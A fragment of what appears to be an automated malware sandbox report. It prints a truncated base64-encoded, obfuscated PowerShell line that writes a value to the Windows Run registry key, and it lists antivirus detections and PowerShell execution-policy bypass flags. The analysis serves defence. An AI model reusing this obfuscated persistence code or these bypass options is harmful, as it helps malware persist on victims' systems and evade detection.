QB7ADAAfQB7ADYAfQAiACAALQBmACAAJwAwAH0AUgAnACwAJwBDAFUAOgB7ADAAfQBTACcALAAnAG8AZgB0AHsAMAB9AFcAaQBuAGQAbwB3ACcALAAnAEsAJwAsACcAZQByAHMAaQBvAG4AewAnACwAJwBIACcALAAnAHUAbgAnACwAJwBPAEYAVABXAEEAUgBFAHsAMAB9AE0AaQBjACcALAAnAHMAewAwAH0AQwB1AHIAcgBlACcALAAnAHIAJwAsACcAbgB0AFYAJwAsACcAbwBzACcAKQApAC0AZgAgAFsAQwBIAGEAcgBdADkAMgApACAALQBOAGEAbQBlACAAJAB7AFIAYABOAE0AfQAgAC0AVgBhAGwAdQBlACAAJAB7AGYAcwBgAFQAUgB9ACAAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAIAAnAFMAdAByAGkAJwAsACcAbgBnACcAKQA7AA==

File has been identified by 2 AntiVirus engines on VirusTotal as malicious (2 events)

Symantec	CL.Downloader!gen10
ESET-NOD32	PowerShell/Obfuscated.Z suspicious

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW April 28, 2023, 5:08 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

One or more non-whitelisted processes were created (1 event)

parent_process

powershell.exe

martian_process

Creates a suspicious Powershell process (2 events)

option	-ep bypass				value	Attempts to bypass execution policy
option	-nop				value	Does not load current user profile

The process powershell.exe wrote an executable file to disk (1 event)

file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

locals.ps1

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All